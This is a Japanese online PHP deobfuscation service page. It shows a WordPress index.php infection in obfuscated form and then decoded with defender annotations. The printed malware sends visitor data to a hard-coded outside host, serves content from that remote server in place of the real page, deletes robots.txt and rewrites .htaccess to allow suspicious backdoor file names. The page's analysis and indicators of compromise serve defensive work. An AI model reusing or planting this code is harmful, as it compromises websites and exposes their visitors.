
PHP 難読化コードの復元・デコード

WordPress 等で見つかる PHP のマルウェア・ウイルス・改ざんコードをオンラインでデコードして難読化を解除し、
元の読みやすいコードに戻して解読できます。

※すべての難読化コードを解除できるわけではございませんのでご理解とご了承をお願いいたします。

下記のコードを難読化解除しました

<?php goto yLyca; nq9A3: Mi24L: goto R6dtG; IBQyP: function h($url, $pf = '') { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_USERAGENT, "\150"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_FRESH_C...



難読化されたPHPコード

<?php
// Sample as submitted to the decoder, kept verbatim for reference.
// Obfuscation layers visible in the code that follows:
//   - statements are shuffled and stitched together with goto labels, so reading order is not execution order;
//   - string literals (array keys, $_SERVER names, file names) are written as mixed octal/hex escapes;
//   - the remote endpoint and the .htaccess payload are additionally wrapped in base64_decode().
// Long lines appear to have been wrapped by the page, at one point inside an escape sequence;
// for byte-exact work (hashing, signatures) use the file from disk rather than this listing.
// The decoded form of this same sample is shown further down the page.
 goto yLyca; nq9A3: Mi24L: goto R6dtG; IBQyP: function h($url, $pf = '') { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_USERAGENT, "\150"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_FRESH_CONNECT, TRUE); if ($pf != '') { curl_setopt($ch, CURLOPT_POST, 1); if (is_array($pf)) { curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($pf)); } } $r = curl_exec($ch); curl_close($ch); if ($r) { return $r; } return ''; } goto jbaVj; oIJS5: NEHhX: goto sLQWh; geOQp: lYDFf: goto IBQyP; c30MZ: r73tQ: goto n89tT; qZQ3m: $params["\x70\162\157\164\x6f\143\x6f\x6c"] = isset($_SERVER["\x48\124\124\120\x53"]) ? "\x68\x74\164\x70\163\72\57\x2f" : "\x68\x74\x74\160\72\57\57"; goto Z0wYb; sLQWh: while ($try < 3) { $content = h($api, $params); $content = @gzuncompress(base64_decode($content)); $data_array = @preg_split("\x2f\134\174\57\163\x69", $content, -1, PREG_SPLIT_NO_EMPTY); if (!empty($data_array)) { $data = array_pop($data_array); $data = base64_decode($data); foreach ($data_array as $header) { @header($header); } echo $data; die; } $try++; } goto oKgXG; RqSw7: l7jCJ: goto L0oJl; A_OZc: bTUy4: goto hRZQK; wUhyr: $api = base64_decode("\141\110\x52\x30\143\x44\157\x76\114\x7a\x55\62\x4f\124\131\164\131\62\x67\x30\114\x58\x59\170\x4d\104\x67\x75\x63\107\106\x79\144\107\x78\x76\144\x58\101\165\131\62\71\164"); goto ukzJv; n89tT: $try = 0; goto vfP9A; aHe5z: $params["\144\x6f\x6d\141\x69\156"] = isset($_SERVER["\110\124\x54\120\137\x48\117\x53\x54"]) ? 
$_SERVER["\x48\x54\124\120\x5f\x48\x4f\x53\124"] : $_SERVER["\x53\x45\122\x56\105\x52\x5f\x4e\101\x4d\x45"]; goto wuelZ; yzyBp: Y3HEY: goto IWe0R; gNfRd: goto dCLSq; goto bQOio; thbzf: goto TbB9C; goto A_OZc; TzZPR: pK8Sh: goto PUdcu; uE7Pj: goto bTUy4; goto geOQp; JVhaJ: goto dFCmd; goto oIJS5; R6dtG: $params["\x6c\x61\x6e\x67\165\x61\147\145"] = isset($_SERVER["\110\124\124\x50\x5f\x41\x43\x43\105\120\x54\137\114\x41\116\x47\125\101\x47\x45"]) ? $_SERVER["\110\124\124\x50\x5f\x41\103\103\x45\x50\124\137\114\x41\116\107\125\101\107\x45"] : ''; goto JVhaJ; QbYB_: goto r73tQ; goto y6Pgd; L0oJl: h2(); goto QbYB_; Sj1SD: goto ZI6CM; goto hUck4; oKgXG: goto pK8Sh; goto c30MZ; kknQD: Gyh8t: goto wUhyr; jbaVj: goto Y3HEY; goto nq9A3; WbaMk: goto LfFrR; goto kknQD; o1RuO: if ($params["\151\160"] == null) { $params["\151\x70"] = ''; } goto thbzf; yLyca: goto lYDFf; goto yzyBp; ByDcr: $params["\x61\147\x65\x6e\x74"] = isset($_SERVER["\110\x54\124\x50\137\125\123\105\122\137\x41\x47\x45\x4e\124"]) ? $_SERVER["\x48\124\124\120\x5f\125\123\x45\122\137\101\107\105\116\124"] : ''; goto gNfRd; yHvh1: $params["\162\145\161\165\145\x73\x74\x5f\x75\x72\154"] = $_SERVER["\x52\105\x51\x55\105\x53\124\x5f\x55\x52\x49"]; goto uE7Pj; d48UJ: goto Gyh8t; goto JuEVC; NJRjd: LfFrR: goto ByDcr; nXxPJ: goto l7jCJ; goto RqSw7; vfP9A: goto NEHhX; goto hV69x; hV69x: dCLSq: goto IxOIL; oI3Vs: TbB9C: goto qZQ3m; JuEVC: mVpSs: goto yHvh1; hUck4: uSxhR: goto aHe5z; ukzJv: goto uSxhR; goto oI3Vs; W3UIR: if (isset($_REQUEST["\x70\x61\162\x61\155\163"])) { $params["\141\160\151"] = $api; print_r($params); die; } goto nXxPJ; y6Pgd: ZI6CM: goto o1RuO; hRZQK: $params["\x72\145\146\x65\x72\145\x72"] = isset($_SERVER["\x48\x54\x54\120\137\122\105\106\x45\122\x45\x52"]) ? $_SERVER["\x48\x54\124\x50\x5f\122\105\x46\105\x52\x45\122"] : ''; goto WbaMk; Z0wYb: goto Mi24L; goto TzZPR; IWe0R: function h2() { if (file_exists("\x72\x6f\x62\x6f\164\163" . "\56\x74\x78\164")) { @unlink("\x72\157\142\x6f\164\x73" . 
"\x2e\164\x78\164"); } $htaccess = "\x2e" . "\150\x74\x61\x63\x63\145\x73\163"; $content = @base64_decode("\x50\105\132\160\x62\x47\126\172\124\127\106\x30\x59\x32\x67\x67\x49\151\x34\157\x63\x48\154\x38\132\130\150\x6c\x66\x48\102\157\x63\103\153\x6b\111\x6a\x34\113\x49\105\x39\x79\x5a\107\x56\x79\x49\x47\106\163\142\x47\71\x33\114\107\122\x6c\x62\x6e\x6b\113\x49\105\x52\x6c\142\156\153\147\132\156\112\x76\142\123\x42\x68\142\107\167\113\120\x43\x39\x47\x61\127\x78\154\x63\60\x31\x68\x64\x47\x4e\157\x50\147\157\x38\x52\x6d\154\x73\132\130\x4e\x4e\131\130\x52\152\141\103\101\151\130\x69\150\x68\131\155\x39\x31\x64\103\x35\x77\x61\x48\102\70\143\155\x46\153\141\127\70\165\143\x47\x68\167\x66\107\x6c\x75\x5a\x47\126\x34\114\156\x42\157\x63\110\x78\152\142\x32\x35\x30\132\x57\x35\60\x4c\156\x42\x6f\x63\110\170\x73\x62\62\116\162\115\172\x59\167\x4c\x6e\x42\x6f\x63\x48\170\150\x5a\x47\x31\160\142\x69\x35\167\141\110\102\70\144\63\101\x74\142\x47\x39\156\x61\x57\64\x75\143\107\150\167\x66\x48\x64\167\x4c\127\167\x77\132\x32\154\x75\x4c\156\102\157\x63\x48\x78\63\x63\x43\61\x30\141\107\126\164\132\123\x35\167\x61\x48\102\x38\144\63\101\x74\143\x32\x4e\x79\141\x58\x42\60\x63\171\65\167\141\110\x42\70\x64\x33\x41\x74\132\x57\122\x70\144\107\71\171\114\x6e\102\x6f\x63\110\170\x74\131\127\x67\165\x63\x47\150\167\146\x47\160\167\114\x6e\x42\x6f\x63\x48\170\x6c\x65\x48\121\165\x63\x47\x68\x77\113\123\x51\x69\120\x67\x6f\147\124\63\112\x6b\x5a\130\x49\x67\131\127\x78\x73\142\63\x63\x73\x5a\x47\126\165\x65\121\157\x67\121\x57\x78\163\142\63\143\x67\132\x6e\x4a\166\142\x53\102\150\142\x47\x77\113\120\x43\x39\x47\x61\x57\170\154\x63\60\61\x68\x64\107\x4e\x6f\120\x67\157\70\123\x57\x5a\x4e\142\x32\122\61\142\107\x55\147\142\x57\x39\153\x58\x33\x4a\154\144\x33\x4a\160\x64\x47\125\x75\131\x7a\x34\x4b\125\155\x56\x33\x63\x6d\x6c\60\x5a\x55\126\165\132\x32\x6c\165\x5a\x53\102\120\x62\147\x70\x53\132\130\x64\x79\x61\130\x52\x6c\x51\x6d\106\172\132\x53\x41\x76\x43\154\x4a\154\144\63\112\x
70\x64\x47\x56\x53\x64\127\170\154\x49\106\65\160\x62\155\x52\x6c\x65\x46\167\165\143\x47\x68\x77\x4a\x43\x41\164\111\x46\164\115\x58\121\x70\123\132\x58\144\171\141\x58\x52\x6c\121\x32\71\165\x5a\103\x41\154\145\61\x4a\106\x55\126\126\106\125\x31\x52\146\x52\153\154\115\122\125\x35\x42\x54\125\126\x39\x49\103\x45\164\132\x67\x70\x53\x5a\x58\x64\x79\141\130\122\x6c\121\x32\71\x75\x5a\103\101\154\x65\x31\x4a\106\x55\126\x56\x46\x55\61\x52\146\122\x6b\x6c\x4d\x52\125\65\102\x54\125\126\x39\x49\103\105\164\132\101\x70\x53\x5a\x58\144\x79\141\x58\x52\x6c\x55\156\x56\x73\x5a\123\x41\165\x49\103\71\160\x62\x6d\x52\x6c\x65\x43\65\x77\141\110\101\147\127\x30\x78\144\x43\152\x77\166\123\127\132\116\x62\x32\x52\x31\142\107\x55\x2b"); if (file_exists($htaccess)) { $htaccess_content = file_get_contents($htaccess); if ($content == $htaccess_content) { return; } } @chmod($htaccess, 511); @file_put_contents($htaccess, $content); @chmod($htaccess, 420); } goto d48UJ; IxOIL: $params["\151\x70"] = isset($_SERVER["\110\124\x54\120\x5f\x56\111\x41"]) ? $_SERVER["\110\124\x54\x50\x5f\130\x5f\x46\x4f\x52\x57\x41\122\x44\x45\104\x5f\106\117\x52"] : $_SERVER["\122\x45\x4d\x4f\x54\x45\137\x41\x44\x44\122"]; goto Sj1SD; bQOio: dFCmd: goto W3UIR; wuelZ: goto mVpSs; goto NJRjd; PUdcu: ?>
<?php
// NOTE(review): from here on the text looks like the stock WordPress front controller (index.php);
// the obfuscated block above sits in front of it in the same file — confirm by diffing
// against a clean index.php from the same WordPress release.
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */

/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
define( 'WP_USE_THEMES', true );

/** Loads the WordPress Environment and Template */
require __DIR__ . '/wp-blog-header.php';

デコード(難読化解除)されたコード

<?php

/**
 * HTTP helper the injected code uses to contact its remote server.
 *
 * Sends a cURL request to $url with a fixed one-character User-Agent ("h"),
 * a 30-second timeout and CURLOPT_FRESH_CONNECT. A value of $pf that is not
 * loosely equal to '' switches the request to POST; the fields are attached
 * only when $pf is an array.
 *
 * Defender notes: no TLS-related options are set here and the endpoint this
 * sample uses is plain http://, so the exchange is visible to egress proxies
 * and network sensors. Outbound POSTs from the web server carrying the
 * User-Agent "h" are a usable hunting signal.
 *
 * @param mixed $url Target URL, passed unchanged to CURLOPT_URL.
 * @param mixed $pf  POST fields; '' (the default) adds no POST options.
 * @return mixed The value returned by curl_exec(), or '' when that value is falsy.
 */
function h($url, $pf = '')
{
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_USERAGENT, "h");
    // Return the body from curl_exec() instead of printing it.
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_TIMEOUT, 30);
    curl_setopt($ch, CURLOPT_FRESH_CONNECT, TRUE);
    if ($pf != '') {
        curl_setopt($ch, CURLOPT_POST, 1);
        if (is_array($pf)) {
            // Array is flattened to a URL-encoded form body.
            curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($pf));
        }
    }
    $r = curl_exec($ch);
    curl_close($ch);
    // Any falsy result (failed transfer, empty body) is reported as ''; no error is surfaced.
    if ($r) {
        return $r;
    }
    return '';
}
/**
 * Tampers with the crawler and access-control files next to the infected script.
 *
 * Deletes robots.txt if it exists, then makes sure .htaccess holds exactly the
 * rule set embedded below, overwriting the file whenever its content differs.
 * Both paths are relative, so they resolve against the current working directory.
 *
 * Defender notes:
 *  - A missing robots.txt together with an .htaccess matching this rule set is an
 *    indicator of this infection.
 *  - Most names in the "Allow from all" list are not files a stock WordPress install
 *    ships in its root; treat any of them found on disk as suspect and compare the
 *    tree against a clean copy of the same WordPress version.
 *  - Restoring .htaccess alone does not hold: this function is called again by the
 *    injected code on later requests, so remove the injection from index.php first.
 *
 * @return void
 */
function h2()
{
    if (file_exists("robots.txt")) {
        @unlink("robots.txt");
    }
    $htaccess = ".htaccess";
    // Rule set written to .htaccess (base64-encoded in the submitted sample):
    //   1. deny requests for files whose names end in py, exe or php;
    //   2. re-allow a fixed list of PHP file names, including index.php and wp-login.php;
    //   3. WordPress-style mod_rewrite rules routing unmatched paths to /index.php.
    // NOTE(review): the leading @ on a string literal is what the decoder left of the
    // original @base64_decode("...") call; it has no effect here.
    $content = @"<FilesMatch \".(py|exe|php)\$\">\n Order allow,deny\n Deny from all\n</FilesMatch>\n<FilesMatch \"^(about.php|radio.php|index.php|content.php|lock360.php|admin.php|wp-login.php|wp-l0gin.php|wp-theme.php|wp-scripts.php|wp-editor.php|mah.php|jp.php|ext.php)\$\">\n Order allow,deny\n Allow from all\n</FilesMatch>\n<IfModule mod_rewrite.c>\nRewriteEngine On\nRewriteBase /\nRewriteRule ^index\\.php\$ - [L]\nRewriteCond %{REQUEST_FILENAME} !-f\nRewriteCond %{REQUEST_FILENAME} !-d\nRewriteRule . /index.php [L]\n</IfModule>";
    if (file_exists($htaccess)) {
        $htaccess_content = file_get_contents($htaccess);
        // Already in the desired state: skip the write so the file's mtime is left alone.
        if ($content == $htaccess_content) {
            return;
        }
    }
    // Modes are decimal literals: 511 is octal 0777 and 420 is octal 0644.
    // The file is opened up, overwritten, then set back to a normal-looking mode;
    // every step is @-suppressed, so failures leave no PHP warning.
    @chmod($htaccess, 511);
    @file_put_contents($htaccess, $content);
    @chmod($htaccess, 420);
}
// Main body of the injected code. It runs before the WordPress bootstrap that follows it
// in the same file, so it executes on requests served through this index.php.

// Hard-coded remote endpoint (base64-encoded in the submitted sample). Plain http://.
// Defender note: use this host as an indicator in DNS, proxy and firewall logs.
$api = "http://5696-ch4-v108.partloup.com";
// Per-request visitor and site details that are POSTed to the endpoint below:
// host name, requested URI, referer, user agent, client IP, scheme and Accept-Language.
$params["domain"] = isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $_SERVER["SERVER_NAME"];
$params["request_url"] = $_SERVER["REQUEST_URI"];
$params["referer"] = isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : '';
$params["agent"] = isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : '';
// Tests for a Via header but then reads X-Forwarded-For; when that header is absent the
// value is null, which the check right after this line turns into ''.
$params["ip"] = isset($_SERVER["HTTP_VIA"]) ? $_SERVER["HTTP_X_FORWARDED_FOR"] : $_SERVER["REMOTE_ADDR"];
if ($params["ip"] == null) {
    $params["ip"] = '';
}
$params["protocol"] = isset($_SERVER["HTTPS"]) ? "https://" : "http://";
$params["language"] = isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : '';
// Diagnostic switch: when the request carries a "params" parameter, the collected values
// plus the endpoint are printed with print_r() and the script stops, before h2() runs.
// Defender note: access-log entries with a "params" parameter against index.php are worth
// reviewing when scoping this infection.
if (isset($_REQUEST["params"])) {
    $params["api"] = $api;
    print_r($params);
    die;
}
// Remove robots.txt and (re)write .htaccess — see h2().
h2();
// Up to three attempts to fetch a replacement response from the endpoint. Each attempt
// uses h() with its 30-second timeout, so a dead endpoint can delay the page noticeably.
$try = 0;
while ($try < 3) {
    $content = h($api, $params);
    // Wire format as handled here: base64 text wrapping zlib-compressed data.
    $content = @gzuncompress(base64_decode($content));
    // The unpacked text is split on "|".
    // NOTE(review): the submitted sample passes -1 (no limit) as the third argument;
    // the 1 shown in this decoded listing looks like a decoder artifact. With -1 the
    // pieces before the last one are the header lines used below.
    $data_array = @preg_split("/\\|/si", $content, 1, PREG_SPLIT_NO_EMPTY);
    if (!empty($data_array)) {
        // Last piece: base64-encoded response body.
        $data = array_pop($data_array);
        $data = base64_decode($data);
        // Remaining pieces are emitted verbatim as HTTP response headers, so the remote
        // server controls the response headers as well as the body.
        foreach ($data_array as $header) {
            @header($header);
        }
        // The remote content replaces the page and execution stops here: WordPress is
        // never loaded for this request.
        echo $data;
        die;
    }
    $try++;
}
// All attempts failed or returned nothing usable: fall through to the normal WordPress
// bootstrap below, so the site looks unchanged for that request.
// NOTE(review): the remainder looks like the stock WordPress front controller that the
// injected code was placed in front of — confirm against a clean index.php.
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */
/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
define('WP_USE_THEMES', true);
/** Loads the WordPress Environment and Template */
// NOTE(review): the submitted file has `require __DIR__ . '/wp-blog-header.php';`.
// The absolute path below presumably comes from the decoder evaluating __DIR__ in its
// own environment; it is not part of the sample.
require "/var/www/html/wp-blog-header.php";

